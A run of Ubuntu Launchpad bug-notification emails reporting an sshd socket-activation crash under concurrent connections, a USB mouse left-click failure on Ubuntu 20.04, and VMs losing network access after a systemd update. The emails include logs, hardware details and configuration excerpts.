sshs in (invoking unison) twice in quick succession. Underlying hardware
is an ARM board which may a little slow, don't know if that helps to
trigger race?
I'm also a little confused as to whether socket activation is the
default under Ubuntu or not. My etckeeper history suggests it's been
enabled here since 2014, when records began .. so no idea if it was
something I enabled or not!
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1905285
Title:
socket-activated sshd breaks on concurrent connections
Status in openssh package in Ubuntu:
Triaged
Bug description:
This is mostly the same issue as https://bugs.debian.org/cgi-
bin/bugreport.cgi?bug=934663.
With the default configuration of openssh-server and systemd, sshd
will complain and crash when multiple connections are made and
terminated in a quick succession, e.g. with `ssh-keyscan`. It results
in the following errors in /var/log/auth.log:
```
Nov 22 20:53:34 {host} sshd[14567]: Unable to negotiate with {client} port
41460: no matching host key type found. Their offer:
sk-ecdsa-sha2-nistp...@openssh.com [preauth]
Nov 22 20:53:34 {host} sshd[14570]: fatal: chroot("/run/sshd"): No such file
or directory [preauth]
Nov 22 20:53:34 {host} sshd[14569]: fatal: chroot("/run/sshd"): No such file
or directory [preauth]
Nov 22 20:53:34 {host} sshd[14568]: fatal: chroot("/run/sshd"): No such file
or directory [preauth]
Nov 22 20:53:34 {host} sshd[14566]: fatal: chroot("/run/sshd"): No such file
or directory [preauth]
Nov 22 20:53:47 {host} sshd[14584]: Connection closed by {client} port 59312
[preauth]
Nov 22 20:53:47 {host} sshd[14586]: fatal: chroot("/run/sshd"): No such file
or directory [preauth]
Nov 22 20:53:48 {host} sshd[14585]: fatal: chroot("/run/sshd"): No such file
or directory [preauth]
```
as well as e.g. missing responses in ssh-keyscan:
```
$ ssh-keyscan -vvv {host}
debug2: fd 3 setting O_NONBLOCK
debug3: conalloc: oname {host} kt 2
debug2: fd 4 setting O_NONBLOCK
debug3: conalloc: oname {host} kt 4
debug2: fd 5 setting O_NONBLOCK
debug3: conalloc: oname {host} kt 8
debug2: fd 6 setting O_NONBLOCK
debug3: conalloc: oname {host} kt 32
debug2: fd 7 setting O_NONBLOCK
debug3: conalloc: oname {host} kt 64
debug1: match: OpenSSH_8.2p1 Ubuntu-4ubuntu0.1 pat OpenSSH* compat 0x0400
# {host}:22 SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1
debug3: send packet: type 20
debug1: SSH2_MSG_KEXINIT sent
debug3: receive packet: type 20
debug1: SSH2_MSG_KEXINIT received
debug2: local client KEXINIT proposal
debug2: KEX algorithms:
curve25519-sha256,curve25519-sha...@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256
debug2: host key algorithms: sk-ecdsa-sha2-nistp...@openssh.com
debug2: ciphers ctos:
chacha20-poly1...@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-...@openssh.com,aes256-...@openssh.com
debug2: ciphers stoc:
chacha20-poly1...@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-...@openssh.com,aes256-...@openssh.com
debug2: MACs ctos:
umac-64-...@openssh.com,umac-128-...@openssh.com,hmac-sha2-256-...@openssh.com,hmac-sha2-512-...@openssh.com,hmac-sha1-...@openssh.com,umac...@openssh.com,umac-...@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
debug2: MACs stoc:
umac-64-...@openssh.com,umac-128-...@openssh.com,hmac-sha2-256-...@openssh.com,hmac-sha2-512-...@openssh.com,hmac-sha1-...@openssh.com,umac...@openssh.com,umac-...@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
debug2: compression ctos: none,z...@openssh.com
debug2: compression stoc: none,z...@openssh.com
debug2: languages ctos:
debug2: languages stoc:
debug2: first_kex_follows 0
debug2: reserved 0
debug2: peer server KEXINIT proposal
debug2: KEX algorithms:
curve25519-sha256,curve25519-sha...@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1
debug2: host key algorithms:
rsa-sha2-512,rsa-sha2-256,ssh-rsa,ecdsa-sha2-nistp256,ssh-ed25519
debug2: ciphers ctos:
chacha20-poly1...@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-...@openssh.com,aes256-...@openssh.com
debug2: ciphers stoc:
chacha20-poly1...@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-...@openssh.com,aes256-...@openssh.com
debug2: MACs ctos:
umac-64-...@openssh.com,umac-128-...@openssh.com,hmac-sha2-256-...@openssh.com,hmac-sha2-512-...@openssh.com,hmac-sha1-...@openssh.com,umac...@openssh.com,umac-...@openssh.com
[Touch-packages] [Bug 1933003] Re: left click on USB mouse stops working
# Recent apt install history Commandline: apt upgrade Upgrade: brave-browser:amd64 (1.25.72, 1.25.73), gir1.2-secret-1:amd64 (0.20.3-0ubuntu1, 0.20.4-0ubuntu1), libsystemd0:amd64 (245.4-4ubuntu3.6, 245.4-4ubuntu3.7), libsecret-1-0:amd64 (0.20.3-0ubuntu1, 0.20.4-0ubuntu1), udev:amd64 (245.4-4ubuntu3.6, 245.4-4ubuntu3.7), libsecret-common:amd64 (0.20.3-0ubuntu1, 0.20.4-0ubuntu1), libudev1:amd64 (245.4-4ubuntu3.6, 245.4-4ubuntu3.7), systemd-timesyncd:amd64 (245.4-4ubuntu3.6, 245.4-4ubuntu3.7), systemd-sysv:amd64 (245.4-4ubuntu3.6, 245.4-4ubuntu3.7), libpam-systemd:amd64 (245.4-4ubuntu3.6, 245.4-4ubuntu3.7), systemd:amd64 (245.4-4ubuntu3.6, 245.4-4ubuntu3.7), libnss-systemd:amd64 (245.4-4ubuntu3.6, 245.4-4ubuntu3.7) Commandline: apt install gnome-clock -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/1933003 Title: left click on USB mouse stops working Status in xorg package in Ubuntu: New Bug description: ## Issue with mouse left-button click Issue with left-button (button 1) click. After login left mouse button click stops working. Within xev rectangle, it (button 1) does not show output first time. but after right button click it starts showing output in xen output as shown in xev-output.log file. After that, left button click works once or twice in other windows like chrome etc, but then stops working after that. full manufacturer and model of your mouse. - HP X1000 Wired Mouse - Connected via USB - Has 2-buttons and one middle scrooll wheel and has optical sensor ## Attachements (inside 'debug-attachments.zip' file_ - Recent apt updates are in apt-history.log file - xen output as shown in xev-output.log file - xmodmap -pp > ~/xmodmap-pp ProblemType: Bug DistroRelease: Ubuntu 20.04 Package: xorg 1:7.7+19ubuntu14 ProcVersionSignature: Ubuntu 5.8.0-55.62~20.04.1-generic 5.8.18 Uname: Linux 5.8.0-55-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair nvidia_modeset nvidia .proc.driver.nvidia.capabilities.gpu0: Error: path was not a regular file. .proc.driver.nvidia.capabilities.mig: Error: path was not a regular file. .proc.driver.nvidia.gpus..01.00.0: Error: path was not a regular file. .proc.driver.nvidia.registry: Binary: "" .proc.driver.nvidia.suspend: suspend hibernate resume .proc.driver.nvidia.suspend_depth: default modeset uvm .proc.driver.nvidia.version: NVRM version: NVIDIA UNIX x86_64 Kernel Module 450.119.03 Mon Mar 29 17:51:27 UTC 2021 GCC version: gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04) ApportVersion: 2.20.11-0ubuntu27.18 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CasperMD5CheckResult: skip CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Sat Jun 19 20:10:30 2021 DistUpgraded: Fresh install DistroCodename: focal DistroVariant: ubuntu DkmsStatus: nvidia, 450.119.03, 5.8.0-53-generic, x86_64: installed nvidia, 450.119.03, 5.8.0-55-generic, x86_64: installed ExtraDebuggingInterest: Yes GraphicsCard: Intel Corporation UHD Graphics 620 [8086:5917] (rev 07) (prog-if 00 [VGA controller]) Subsystem: Hewlett-Packard Company UHD Graphics 620 [103c:83ba] Subsystem: Hewlett-Packard Company GP108M [GeForce MX150] [103c:83ba] InstallationDate: Installed on 2020-05-18 (396 days ago) InstallationMedia: Ubuntu 20.04 LTS "Focal Fossa" - Release amd64 (20200423) Lsusb: Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 004: ID 8087:0025 Intel Corp. Bus 001 Device 003: ID 0408:5251 Quanta Computer, Inc. HP Wide Vision FHD Camera Bus 001 Device 002: ID 093a:2510 Pixart Imaging, Inc. Optical Mouse Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub MachineType: HP HP Spectre x360 Convertible 15-ch0xx ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.8.0-55-generic root=UUID=10b0a8d0-b11d-4604-a11a-0717ee06ce60 ro quiet splash vt.handoff=7 SourcePackage: xorg UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 05/20/2019 dmi.bios.release: 15.31 dmi.bios.vendor: AMI dmi.bios.version: F.31 dmi.board.asset.tag: Base Board Asset Tag dmi.board.name: 83BA dmi.board.vendor: HP dmi.board.version: 57.33 dmi.chassis.type: 31 dmi.chassis.vendor: HP dmi.chassis.version: Chassis Version dmi.ec.firmware.release: 57.33 dmi.modalias: dmi:bvnAMI:bvrF.31:bd05/20/2019:br15.31:efr57.33:svnHP:pnHPSpectrex360Convertible15-ch0xx:pvr:rvnHP:rn83BA:rvr57.33:cvnHP:ct31:cvrChassisVersion: dmi.product.family: 103C_5335KV HP Spectre dmi.product.name: HP Spectre x360 Convertible 15-ch0xx dmi.product.sku: 2LV24UA#ABA dmi.sys.vendor: HP version.compiz: compiz N/A version.libdrm2: libdrm2 2.4.102-1ubuntu1~20.04.1 version.libgl1-mesa-dri: libgl1-mesa-dri 20.2.6-0ubuntu0.
[Touch-packages] [Bug 1933003] Re: left click on USB mouse stops working
Adding xmodmap -pp > ~/xmodmap-pp # xev outout $ xev | grep -i button ButtonPress event, serial 37, synthetic NO, window 0x3c1, state 0x10, button 3, same_screen YES ButtonRelease event, serial 37, synthetic NO, window 0x3c1, state 0x410, button 3, same_screen YES ButtonPress event, serial 37, synthetic NO, window 0x3c1, state 0x10, button 4, same_screen YES ButtonRelease event, serial 37, synthetic NO, window 0x3c1, state 0x810, button 4, same_screen YES ButtonPress event, serial 37, synthetic NO, window 0x3c1, state 0x10,pus, button 5, same_screen YES ButtonRelease event, serial 37, synthetic NO, window 0x3c1, state 0x1010, button 5, same_screen YES ButtonPress event, serial 37, synthetic NO, window 0x3c1, state 0x10, button 1, same_screen YES ButtonRelease event, serial 37, synthetic NO, window 0x3c1, state 0x110, button 1, same_screen YES ** Attachment added: "Output of xmodmap -pp > ~/xmodmap-pp" https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1933003/+attachment/5505778/+files/xmodmap-pp -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/1933003 Title: left click on USB mouse stops working Status in xorg package in Ubuntu: New Bug description: ## Issue with mouse left-button click Issue with left-button (button 1) click. After login left mouse button click stops working. Within xev rectangle, it (button 1) does not show output first time. but after right button click it starts showing output in xen output as shown in xev-output.log file. After that, left button click works once or twice in other windows like chrome etc, but then stops working after that. full manufacturer and model of your mouse. - HP X1000 Wired Mouse - Connected via USB - Has 2-buttons and one middle scrooll wheel and has optical sensor ## Attachements (inside 'debug-attachments.zip' file_ - Recent apt updates are in apt-history.log file - xen output as shown in xev-output.log file - xmodmap -pp > ~/xmodmap-pp ProblemType: Bug DistroRelease: Ubuntu 20.04 Package: xorg 1:7.7+19ubuntu14 ProcVersionSignature: Ubuntu 5.8.0-55.62~20.04.1-generic 5.8.18 Uname: Linux 5.8.0-55-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair nvidia_modeset nvidia .proc.driver.nvidia.capabilities.gpu0: Error: path was not a regular file. .proc.driver.nvidia.capabilities.mig: Error: path was not a regular file. .proc.driver.nvidia.gpus..01.00.0: Error: path was not a regular file. .proc.driver.nvidia.registry: Binary: "" .proc.driver.nvidia.suspend: suspend hibernate resume .proc.driver.nvidia.suspend_depth: default modeset uvm .proc.driver.nvidia.version: NVRM version: NVIDIA UNIX x86_64 Kernel Module 450.119.03 Mon Mar 29 17:51:27 UTC 2021 GCC version: gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04) ApportVersion: 2.20.11-0ubuntu27.18 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CasperMD5CheckResult: skip CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Sat Jun 19 20:10:30 2021 DistUpgraded: Fresh install DistroCodename: focal DistroVariant: ubuntu DkmsStatus: nvidia, 450.119.03, 5.8.0-53-generic, x86_64: installed nvidia, 450.119.03, 5.8.0-55-generic, x86_64: installed ExtraDebuggingInterest: Yes GraphicsCard: Intel Corporation UHD Graphics 620 [8086:5917] (rev 07) (prog-if 00 [VGA controller]) Subsystem: Hewlett-Packard Company UHD Graphics 620 [103c:83ba] Subsystem: Hewlett-Packard Company GP108M [GeForce MX150] [103c:83ba] InstallationDate: Installed on 2020-05-18 (396 days ago) InstallationMedia: Ubuntu 20.04 LTS "Focal Fossa" - Release amd64 (20200423) Lsusb: Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 004: ID 8087:0025 Intel Corp. Bus 001 Device 003: ID 0408:5251 Quanta Computer, Inc. HP Wide Vision FHD Camera Bus 001 Device 002: ID 093a:2510 Pixart Imaging, Inc. Optical Mouse Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub MachineType: HP HP Spectre x360 Convertible 15-ch0xx ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.8.0-55-generic root=UUID=10b0a8d0-b11d-4604-a11a-0717ee06ce60 ro quiet splash vt.handoff=7 SourcePackage: xorg UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 05/20/2019 dmi.bios.release: 15.31 dmi.bios.vendor: AMI dmi.bios.version: F.31 dmi.board.asset.tag: Base Board Asset Tag dmi.board.name: 83BA dmi.board.vendor: HP dmi.board.version: 57.33 dmi.chassis.type: 31 dmi.chassis.vendor: HP dmi.chassis.version: Chassis Version dmi.ec.firmware.release: 57.33 dmi.modalias: dmi:bvnAMI:bvrF.31:bd05/20/2019:br15.31:efr57.33:svnHP:pnHP
[Touch-packages] [Bug 1933003] [NEW] left click on USB mouse stops working
Public bug reported: ## Issue with mouse left-button click Issue with left-button (button 1) click. After login left mouse button click stops working. Within xev rectangle, it (button 1) does not show output first time. but after right button click it starts showing output in xen output as shown in xev-output.log file. After that, left button click works once or twice in other windows like chrome etc, but then stops working after that. full manufacturer and model of your mouse. - HP X1000 Wired Mouse - Connected via USB - Has 2-buttons and one middle scrooll wheel and has optical sensor ## Attachements (inside 'debug-attachments.zip' file_ - Recent apt updates are in apt-history.log file - xen output as shown in xev-output.log file - xmodmap -pp > ~/xmodmap-pp ProblemType: Bug DistroRelease: Ubuntu 20.04 Package: xorg 1:7.7+19ubuntu14 ProcVersionSignature: Ubuntu 5.8.0-55.62~20.04.1-generic 5.8.18 Uname: Linux 5.8.0-55-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair nvidia_modeset nvidia .proc.driver.nvidia.capabilities.gpu0: Error: path was not a regular file. .proc.driver.nvidia.capabilities.mig: Error: path was not a regular file. .proc.driver.nvidia.gpus..01.00.0: Error: path was not a regular file. .proc.driver.nvidia.registry: Binary: "" .proc.driver.nvidia.suspend: suspend hibernate resume .proc.driver.nvidia.suspend_depth: default modeset uvm .proc.driver.nvidia.version: NVRM version: NVIDIA UNIX x86_64 Kernel Module 450.119.03 Mon Mar 29 17:51:27 UTC 2021 GCC version: gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04) ApportVersion: 2.20.11-0ubuntu27.18 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CasperMD5CheckResult: skip CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Sat Jun 19 20:10:30 2021 DistUpgraded: Fresh install DistroCodename: focal DistroVariant: ubuntu DkmsStatus: nvidia, 450.119.03, 5.8.0-53-generic, x86_64: installed nvidia, 450.119.03, 5.8.0-55-generic, x86_64: installed ExtraDebuggingInterest: Yes GraphicsCard: Intel Corporation UHD Graphics 620 [8086:5917] (rev 07) (prog-if 00 [VGA controller]) Subsystem: Hewlett-Packard Company UHD Graphics 620 [103c:83ba] Subsystem: Hewlett-Packard Company GP108M [GeForce MX150] [103c:83ba] InstallationDate: Installed on 2020-05-18 (396 days ago) InstallationMedia: Ubuntu 20.04 LTS "Focal Fossa" - Release amd64 (20200423) Lsusb: Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 004: ID 8087:0025 Intel Corp. Bus 001 Device 003: ID 0408:5251 Quanta Computer, Inc. HP Wide Vision FHD Camera Bus 001 Device 002: ID 093a:2510 Pixart Imaging, Inc. Optical Mouse Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub MachineType: HP HP Spectre x360 Convertible 15-ch0xx ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.8.0-55-generic root=UUID=10b0a8d0-b11d-4604-a11a-0717ee06ce60 ro quiet splash vt.handoff=7 SourcePackage: xorg UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 05/20/2019 dmi.bios.release: 15.31 dmi.bios.vendor: AMI dmi.bios.version: F.31 dmi.board.asset.tag: Base Board Asset Tag dmi.board.name: 83BA dmi.board.vendor: HP dmi.board.version: 57.33 dmi.chassis.type: 31 dmi.chassis.vendor: HP dmi.chassis.version: Chassis Version dmi.ec.firmware.release: 57.33 dmi.modalias: dmi:bvnAMI:bvrF.31:bd05/20/2019:br15.31:efr57.33:svnHP:pnHPSpectrex360Convertible15-ch0xx:pvr:rvnHP:rn83BA:rvr57.33:cvnHP:ct31:cvrChassisVersion: dmi.product.family: 103C_5335KV HP Spectre dmi.product.name: HP Spectre x360 Convertible 15-ch0xx dmi.product.sku: 2LV24UA#ABA dmi.sys.vendor: HP version.compiz: compiz N/A version.libdrm2: libdrm2 2.4.102-1ubuntu1~20.04.1 version.libgl1-mesa-dri: libgl1-mesa-dri 20.2.6-0ubuntu0.20.04.1 version.libgl1-mesa-glx: libgl1-mesa-glx 20.2.6-0ubuntu0.20.04.1 version.nvidia-graphics-drivers: nvidia-graphics-drivers-* N/A version.xserver-xorg-core: xserver-xorg-core 2:1.20.9-2ubuntu1.2~20.04.2 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-1 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20200226-1 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.16-1 xserver.bootTime: Sat Jun 19 18:03:02 2021 xserver.configfile: default xserver.errors: xserver.logfile: /var/log/Xorg.0.log xserver.version: 2:1.20.9-2ubuntu1.2~20.04.2 ** Affects: xorg (Ubuntu) Importance: Undecided Status: New ** Tags: amd64 apport-bug focal ubuntu ** Attachment added: "debug-attachments.zip" https://bugs.launchpad.net/bugs/1933003/+attachment/5505753/+files/debug-attachments.zip -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/1933003 Title: left click on USB mouse stops working Status in xorg package in Ubuntu: New Bug de
[Touch-packages] [Bug 1933003] Re: left click on USB mouse stops working
Suspect the issue is after recent apt upgrade command run. apt history log recent snapshot is attached. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/1933003 Title: left click on USB mouse stops working Status in xorg package in Ubuntu: New Bug description: ## Issue with mouse left-button click Issue with left-button (button 1) click. After login left mouse button click stops working. Within xev rectangle, it (button 1) does not show output first time. but after right button click it starts showing output in xen output as shown in xev-output.log file. After that, left button click works once or twice in other windows like chrome etc, but then stops working after that. full manufacturer and model of your mouse. - HP X1000 Wired Mouse - Connected via USB - Has 2-buttons and one middle scrooll wheel and has optical sensor ## Attachements (inside 'debug-attachments.zip' file_ - Recent apt updates are in apt-history.log file - xen output as shown in xev-output.log file - xmodmap -pp > ~/xmodmap-pp ProblemType: Bug DistroRelease: Ubuntu 20.04 Package: xorg 1:7.7+19ubuntu14 ProcVersionSignature: Ubuntu 5.8.0-55.62~20.04.1-generic 5.8.18 Uname: Linux 5.8.0-55-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair nvidia_modeset nvidia .proc.driver.nvidia.capabilities.gpu0: Error: path was not a regular file. .proc.driver.nvidia.capabilities.mig: Error: path was not a regular file. .proc.driver.nvidia.gpus..01.00.0: Error: path was not a regular file. .proc.driver.nvidia.registry: Binary: "" .proc.driver.nvidia.suspend: suspend hibernate resume .proc.driver.nvidia.suspend_depth: default modeset uvm .proc.driver.nvidia.version: NVRM version: NVIDIA UNIX x86_64 Kernel Module 450.119.03 Mon Mar 29 17:51:27 UTC 2021 GCC version: gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04) ApportVersion: 2.20.11-0ubuntu27.18 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CasperMD5CheckResult: skip CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Sat Jun 19 20:10:30 2021 DistUpgraded: Fresh install DistroCodename: focal DistroVariant: ubuntu DkmsStatus: nvidia, 450.119.03, 5.8.0-53-generic, x86_64: installed nvidia, 450.119.03, 5.8.0-55-generic, x86_64: installed ExtraDebuggingInterest: Yes GraphicsCard: Intel Corporation UHD Graphics 620 [8086:5917] (rev 07) (prog-if 00 [VGA controller]) Subsystem: Hewlett-Packard Company UHD Graphics 620 [103c:83ba] Subsystem: Hewlett-Packard Company GP108M [GeForce MX150] [103c:83ba] InstallationDate: Installed on 2020-05-18 (396 days ago) InstallationMedia: Ubuntu 20.04 LTS "Focal Fossa" - Release amd64 (20200423) Lsusb: Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 004: ID 8087:0025 Intel Corp. Bus 001 Device 003: ID 0408:5251 Quanta Computer, Inc. HP Wide Vision FHD Camera Bus 001 Device 002: ID 093a:2510 Pixart Imaging, Inc. Optical Mouse Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub MachineType: HP HP Spectre x360 Convertible 15-ch0xx ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.8.0-55-generic root=UUID=10b0a8d0-b11d-4604-a11a-0717ee06ce60 ro quiet splash vt.handoff=7 SourcePackage: xorg UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 05/20/2019 dmi.bios.release: 15.31 dmi.bios.vendor: AMI dmi.bios.version: F.31 dmi.board.asset.tag: Base Board Asset Tag dmi.board.name: 83BA dmi.board.vendor: HP dmi.board.version: 57.33 dmi.chassis.type: 31 dmi.chassis.vendor: HP dmi.chassis.version: Chassis Version dmi.ec.firmware.release: 57.33 dmi.modalias: dmi:bvnAMI:bvrF.31:bd05/20/2019:br15.31:efr57.33:svnHP:pnHPSpectrex360Convertible15-ch0xx:pvr:rvnHP:rn83BA:rvr57.33:cvnHP:ct31:cvrChassisVersion: dmi.product.family: 103C_5335KV HP Spectre dmi.product.name: HP Spectre x360 Convertible 15-ch0xx dmi.product.sku: 2LV24UA#ABA dmi.sys.vendor: HP version.compiz: compiz N/A version.libdrm2: libdrm2 2.4.102-1ubuntu1~20.04.1 version.libgl1-mesa-dri: libgl1-mesa-dri 20.2.6-0ubuntu0.20.04.1 version.libgl1-mesa-glx: libgl1-mesa-glx 20.2.6-0ubuntu0.20.04.1 version.nvidia-graphics-drivers: nvidia-graphics-drivers-* N/A version.xserver-xorg-core: xserver-xorg-core 2:1.20.9-2ubuntu1.2~20.04.2 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-1 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20200226-1 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.16-1 xserver.bootTime: Sat Jun 19 18:03:02 2021 xserver.configfile: default xserver.errors: xserver.logfile: /var/log/Xorg.0.log xserver.version:
[Touch-packages] [Bug 1933002] [NEW] VMs lost network access after hypervisor upgraded to systemd 245.4-4ubuntu3.7
Public bug reported: Hi, I have a home server running Ubuntu 20.04. It is using KVM to run several VMs (router, Wi-Fi access point, NAS, ...). Everything has been running fine for years now, very happy, very grateful for all the work but... On June 17th, on the hypervisor systemd upgraded from 245.4-4ubuntu3.6 to 245.4-4ubuntu3.7 and all the VMs lost network connectivity. Packages that were upgraded on June 17th: libnss-mymachines libnss-systemd libpam-systemd libsystemd0 libudev1 systemd systemd-container systemd-sysv systemd-timesyncd udev Package installation log: Log started: 2021-06-17 06:34:27 Preparing to unpack .../0-libnss-systemd_245.4-4ubuntu3.7_amd64.deb ... Unpacking libnss-systemd:amd64 (245.4-4ubuntu3.7) over (245.4-4ubuntu3.6) ... Preparing to unpack .../1-systemd-timesyncd_245.4-4ubuntu3.7_amd64.deb ... Unpacking systemd-timesyncd (245.4-4ubuntu3.7) over (245.4-4ubuntu3.6) ... Preparing to unpack .../2-systemd-sysv_245.4-4ubuntu3.7_amd64.deb ... Unpacking systemd-sysv (245.4-4ubuntu3.7) over (245.4-4ubuntu3.6) ... Preparing to unpack .../3-libnss-mymachines_245.4-4ubuntu3.7_amd64.deb ... Unpacking libnss-mymachines:amd64 (245.4-4ubuntu3.7) over (245.4-4ubuntu3.6) ... Preparing to unpack .../4-systemd-container_245.4-4ubuntu3.7_amd64.deb ... Unpacking systemd-container (245.4-4ubuntu3.7) over (245.4-4ubuntu3.6) ... Preparing to unpack .../5-libpam-systemd_245.4-4ubuntu3.7_amd64.deb ... Unpacking libpam-systemd:amd64 (245.4-4ubuntu3.7) over (245.4-4ubuntu3.6) ... Preparing to unpack .../6-systemd_245.4-4ubuntu3.7_amd64.deb ... Unpacking systemd (245.4-4ubuntu3.7) over (245.4-4ubuntu3.6) ... Preparing to unpack .../7-libsystemd0_245.4-4ubuntu3.7_amd64.deb ... Unpacking libsystemd0:amd64 (245.4-4ubuntu3.7) over (245.4-4ubuntu3.6) ... Setting up libsystemd0:amd64 (245.4-4ubuntu3.7) ... Setting up systemd (245.4-4ubuntu3.7) ... Setting up systemd-timesyncd (245.4-4ubuntu3.7) ... Setting up systemd-container (245.4-4ubuntu3.7) ... Setting up systemd-sysv (245.4-4ubuntu3.7) ... Setting up libnss-systemd:amd64 (245.4-4ubuntu3.7) ... Setting up libnss-mymachines:amd64 (245.4-4ubuntu3.7) ... Setting up libpam-systemd:amd64 (245.4-4ubuntu3.7) ... Processing triggers for libc-bin (2.31-0ubuntu9.3) ... Processing triggers for man-db (2.9.1-1) ... Processing triggers for dbus (1.12.16-2ubuntu2.1) ... Log ended: 2021-06-17 06:34:34 Log started: 2021-06-17 06:34:35 Preparing to unpack .../udev_245.4-4ubuntu3.7_amd64.deb ... Unpacking udev (245.4-4ubuntu3.7) over (245.4-4ubuntu3.6) ... Preparing to unpack .../libudev1_245.4-4ubuntu3.7_amd64.deb ... Unpacking libudev1:amd64 (245.4-4ubuntu3.7) over (245.4-4ubuntu3.6) ... Setting up libudev1:amd64 (245.4-4ubuntu3.7) ... Setting up udev (245.4-4ubuntu3.7) ... update-initramfs: deferring update (trigger activated) Processing triggers for systemd (245.4-4ubuntu3.7) ... Processing triggers for man-db (2.9.1-1) ... Processing triggers for libc-bin (2.31-0ubuntu9.3) ... Processing triggers for initramfs-tools (0.136ubuntu6.5) ... update-initramfs: Generating /boot/initrd.img-5.4.0-74-generic Log ended: 2021-06-17 06:35:03 I then tried to revert these packages. apt-cache show libsystemd0 I find 2 versions, 245.4-4ubuntu3 & 245.4-4ubuntu3.7 Not sure why it is not 245.4-4ubuntu3.6 & 245.4-4ubuntu3.7 but anyway... I reverted these packages to 245.4-4ubuntu3 sudo aptitude install libnss-systemd=245.4-4ubuntu3 systemd-timesyncd=245.4-4ubuntu3 systemd-sysv=245.4-4ubuntu3 libnss-mymachines=245.4-4ubuntu3 systemd-container=245.4-4ubuntu3 libpam-systemd=245.4-4ubuntu3 systemd=245.4-4ubuntu3 libsystemd0=245.4-4ubuntu3 sudo reboot All the VMs have access to the network again. My setup: I have 2 NICs on the server: - eno1 is my WAN plugged to my ISP's router and attached to the br-wan bridge - enp2s0 is my LAN and is attached to the br-lan bridge I use static addressing The LAN is IPv4 and IPv6 The WAN is IPv4 only wlx00c0caa5e44f is a USB Wi-Fi adapter attached to br-lan using hostapd VMs use the classic vnet attachement vi /etc/netplan/01-netcfg.yaml # This file describes the network interfaces available on your system # For more information, see netplan(5). network: version: 2 renderer: networkd ethernets: # No DHCP and no addresses set for the ethernet NIC eno1: addresses: [] dhcp4: false dhcp6: false optional: true enp2s0: addresses: [] dhcp4: false dhcp6: false optional: true # Prevent virtual networks and Wi-Fi NIC from acquiring link local IPv6 addresses (fe80::) vnet: match: name: vnet* link-local: [ ] wlx00c0caa5e44f: link-local: [ ] bridges: # Configure a static IPv4 address for br-wan br-wan: interfaces: [eno1] addresses: - 192.168.1.1/24 dhcp4: false d
